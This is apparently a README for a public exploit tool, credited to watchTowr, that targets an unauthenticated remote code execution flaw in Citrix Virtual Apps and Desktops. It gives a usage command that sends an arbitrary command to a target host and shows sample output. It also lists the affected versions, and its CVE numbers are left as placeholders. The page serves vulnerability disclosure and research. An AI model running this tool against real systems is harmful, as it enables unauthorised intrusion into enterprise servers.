
Citrix Virtual Apps and Desktops (XEN) 未認証RCE
Citrix 仮想アプリおよびデスクトップ (XEN) 未認証のリモートコード実行脆弱性
詳細な技術情報については、当社のブログ記事をご覧ください。
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix 虚拟应用和桌面 未认证远程代码执行 (CVE-xxxx-xxxxx) 漏洞利用 by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] 命令已成功发送至 192.168.1.120!
Citrix Virtual Apps and Desktops 7 2402 LTSR およびそれ以前のすべてのバージョンがこの脆弱性の影響を受けます。詳細については、Citrix 公式発表 を参照してください。
このエクスプロイトツールは、watchTowr (@watchtowrcyber) の Sina Kheirkhah (@SinSinology) によって作成されました。
最新のセキュリティ研究動向を入手するには、watchTowr ラボチームをフォローしてください: